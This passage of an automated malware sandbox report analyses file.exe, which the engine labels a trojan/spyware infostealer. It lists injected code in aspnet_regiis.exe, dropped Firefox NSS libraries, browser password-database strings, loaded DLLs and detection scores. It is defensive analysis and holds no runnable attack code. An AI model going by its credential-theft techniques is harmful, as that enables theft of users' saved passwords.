                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7B9E503_2_6C7B9E50
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7D3E503_2_6C7D3E50
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7E2E4E3_2_6C7E2E4E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7B46403_2_6C7B4640
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7F9E303_2_6C7F9E30
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C8076E33_2_6C8076E3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7D7E103_2_6C7D7E10
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7E56003_2_6C7E5600
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C79BEF03_2_6C79BEF0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7AFEF03_2_6C7AFEF0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7F4EA03_2_6C7F4EA0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C806E633_2_6C806E63
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7B5E903_2_6C7B5E90
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7FE6803_2_6C7FE680
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7D77103_2_6C7D7710
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7A9F003_2_6C7A9F00
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7C6FF03_2_6C7C6FF0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C79DFE03_2_6C79DFE0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7E77A03_2_6C7E77A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7DF0703_2_6C7DF070
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7B88503_2_6C7B8850
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7BD8503_2_6C7BD850
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C8050C73_2_6C8050C7
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7DB8203_2_6C7DB820
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7E48203_2_6C7E4820
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7A78103_2_6C7A7810
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7BC0E03_2_6C7BC0E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7D58E03_2_6C7D58E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7C60A03_2_6C7C60A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7EB9703_2_6C7EB970
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7AD9603_2_6C7AD960
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7BA9403_2_6C7BA940
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7CD9B03_2_6C7CD9B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C79C9A03_2_6C79C9A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7D51903_2_6C7D5190
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7F29903_2_6C7F2990
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C80B1703_2_6C80B170
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C80BA903_2_6C80BA90
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7D9A603_2_6C7D9A60
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C802AB03_2_6C802AB0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7B1AF03_2_6C7B1AF0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7DE2F03_2_6C7DE2F0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7D8AC03_2_6C7D8AC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7ACAB03_2_6C7ACAB0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7922A03_2_6C7922A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7C4AA03_2_6C7C4AA0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7AC3703_2_6C7AC370
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7953403_2_6C795340
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C8053C83_2_6C8053C8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7DD3203_2_6C7DD320
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C79F3803_2_6C79F380
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C83ECC03_2_6C83ECC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C89ECD03_2_6C89ECD0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C906C003_2_6C906C00
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C91AC303_2_6C91AC30
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C84AC603_2_6C84AC60
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C8D6D903_2_6C8D6D90
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C844DB03_2_6C844DB0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C9CCDC03_2_6C9CCDC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C9C8D203_2_6C9C8D20
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C96AD503_2_6C96AD50
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C90ED703_2_6C90ED70
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C8C6E903_2_6C8C6E90
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C84AEC03_2_6C84AEC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C8E0EC03_2_6C8E0EC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C920E203_2_6C920E20
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C8DEE703_2_6C8DEE70
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C988FB03_2_6C988FB0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C84EFB03_2_6C84EFB0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C91EFF03_2_6C91EFF0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C840FE03_2_6C840FE0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C846F103_2_6C846F10
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C980F203_2_6C980F20
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C8AEF403_2_6C8AEF40
                          Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                          Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                          Source: C:\Users\user\Desktop\file.exe Code function: String function: 6E80C370 appears 33 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: String function: 004047E8 appears 38 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: String function: 6C7D94D0 appears 90 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: String function: 6C7CCBE8 appears 134 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: String function: 00410609 appears 71 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: String function: 004104E7 appears 36 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: String function: 6C9C09D0 appears 51 times
                          Source: file.exe Static PE information: invalid certificate
                          Source: file.exe, 00000000.00000002.2145053280.0000000000F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs file.exe
                          Source: file.exe, 00000000.00000000.2126154485.0000000000AF4000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameHusbandPlayerEleanor681Grace.NTxu@ vs file.exe
                          Source: file.exe Binary or memory string: OriginalFilenameHusbandPlayerEleanor681Grace.NTxu@ vs file.exe
                          Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: file.exe Static PE information: Section: n@G>6P ZLIB complexity 1.00033367083947
                          Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@5/24@1/3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_6C7F7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_004114A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_00411807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear
                          Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Roaming\msvcp110.dll
                          Source: C:\Users\user\Desktop\file.exe Mutant created: NULL
                          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5756:120:WilError_03
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File created: C:\Users\user\AppData\Local\Temp\delays.tmp
                          Source: file.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File read: C:\Users\user\Desktop\desktop.ini
                          Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                          Source: aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                          Source: aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3379210269.000000001C0A1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3382616447.0000000022018000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3403233819.000000006C9CF000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.3.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                          Source: aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
                          Source: aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3379210269.000000001C0A1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3382616447.0000000022018000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3403233819.000000006C9CF000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.3.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                          Source: aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3379210269.000000001C0A1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3382616447.0000000022018000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3403233819.000000006C9CF000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.3.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                          Source: aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3379210269.000000001C0A1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3382616447.0000000022018000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3403233819.000000006C9CF000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.3.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                          Source: aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
                          Source: aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                          Source: aspnet_regiis.exe, 00000003.00000002.3379210269.000000001C0A1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3382616447.0000000022018000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                          Source: aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
                          Source: aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                          Source: aspnet_regiis.exe, 00000003.00000002.3379210269.000000001C0A1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3382616447.0000000022018000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                          Source: aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                          Source: aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3379210269.000000001C0A1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3382616447.0000000022018000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3403233819.000000006C9CF000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.3.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                          Source: aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3379210269.000000001C0A1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3382616447.0000000022018000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3403233819.000000006C9CF000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.3.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                          Source: aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                          Source: aspnet_regiis.exe, 00000003.00000002.3379210269.000000001C0A1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3382616447.0000000022018000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                          Source: aspnet_regiis.exe, 00000003.00000003.2530342786.0000000002FAF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2517531854.0000000002FB0000.00000004.00000020.00020000.00000000.sdmp, IJKFCF.3.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                          Source: aspnet_regiis.exe, 00000003.00000002.3379210269.000000001C0A1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3382616447.0000000022018000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                          Source: aspnet_regiis.exe, 00000003.00000002.3379210269.000000001C0A1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3382616447.0000000022018000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                          Source: aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                          Source: file.exe ReversingLabs: Detection: 21%
                          Source: file.exe Virustotal: Detection: 30%
                          Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                          Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                          Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                          Source: C:\Users\user\Desktop\file.exe Section loaded: mscoree.dll
                          Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
                          Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
                          Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll
                          Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\user\Desktop\file.exe Section loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\Desktop\file.exe Section loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
                          Source: C:\Users\user\Desktop\file.exe Section loaded: amsi.dll
                          Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
                          Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
                          Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll
                          Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll
                          Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: sspicli.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: wininet.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: rstrtmgr.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: ncrypt.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: ntasn1.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: dbghelp.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: iertutil.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: windows.storage.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: wldp.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: profapi.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: kernel.appcore.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: winhttp.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: mswsock.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: iphlpapi.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: winnsi.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: urlmon.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: srvcli.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: netutils.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: dnsapi.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: rasadhlp.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: fwpuclnt.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: schannel.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: mskeyprotect.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: msasn1.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: dpapi.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: cryptsp.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: rsaenh.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: cryptbase.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mozglue.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wsock32.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: vcruntime140.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: msvcp140.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: windowscodecs.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: propsys.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: edputil.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: windows.staterepositoryps.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: wintypes.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: appresolver.dll
